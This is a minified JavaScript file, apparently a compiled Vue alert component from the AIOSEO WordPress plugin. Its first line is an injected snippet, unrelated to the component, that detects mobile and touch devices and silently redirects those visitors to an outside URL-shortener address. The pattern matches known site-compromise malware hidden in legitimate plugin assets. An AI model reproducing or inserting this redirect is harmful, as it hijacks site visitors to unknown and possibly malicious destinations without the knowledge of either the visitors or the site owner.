(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{aq as b,f as n,Q as l,R as c,v as r,M as i,j as o,U as s,ae as m,i as g,T as y}from"./vendor-vue-ui.232c7c36.js";import{C as p}from"./Index.b9859662.js";import{S as k}from"./CheckSolid.c17e19eb.js";import{S as C}from"./ExclamationSolid.21bbc910.js";const S={class:"aioseo-alert-actionable__content"},A={__name:"Actionable",props:{title:String,text:String,button:String,buttonType:String,type:String,size:String,showClose:Boolean},emits:["click","close-alert"],setup(t){return(a,e)=>{const f=b("base-button");return n(),l(r(p),{class:"aioseo-alert-actionable",type:t.type,size:t.size,showClose:t.showClose,onCloseAlert:e[2]||(e[2]=u=>a.$emit("close-alert"))},{default:c(()=>[t.type==="yellow"?(n(),l(r(C),{key:0})):i("",!0),t.type==="green"?(n(),l(r(k),{key:1})):i("",!0),o("div",S,[o("strong",null,s(t.title),1),o("p",null,[m(s(t.text)+" ",1),t.buttonType==="link"&&t.button?(n(),g("a",{key:0,href:"#",onClick:e[0]||(e[0]=y(u=>a.$emit("click"),["prevent"]))},[m(s(t.button)+" ",1),e[3]||(e[3]=o("span",null,"→",-1))])):i("",!0)]),t.buttonType!=="link"&&t.button?(n(),l(f,{key:0,size:"medium",type:"blue",tag:"button",onClick:e[1]||(e[1]=y(u=>a.$emit("click"),["stop"]))},{default:c(()=>[o("span",null,s(t.button),1)]),_:1})):i("",!0)])]),_:1},8,["type","size","showClose"])}}};export{A as _};
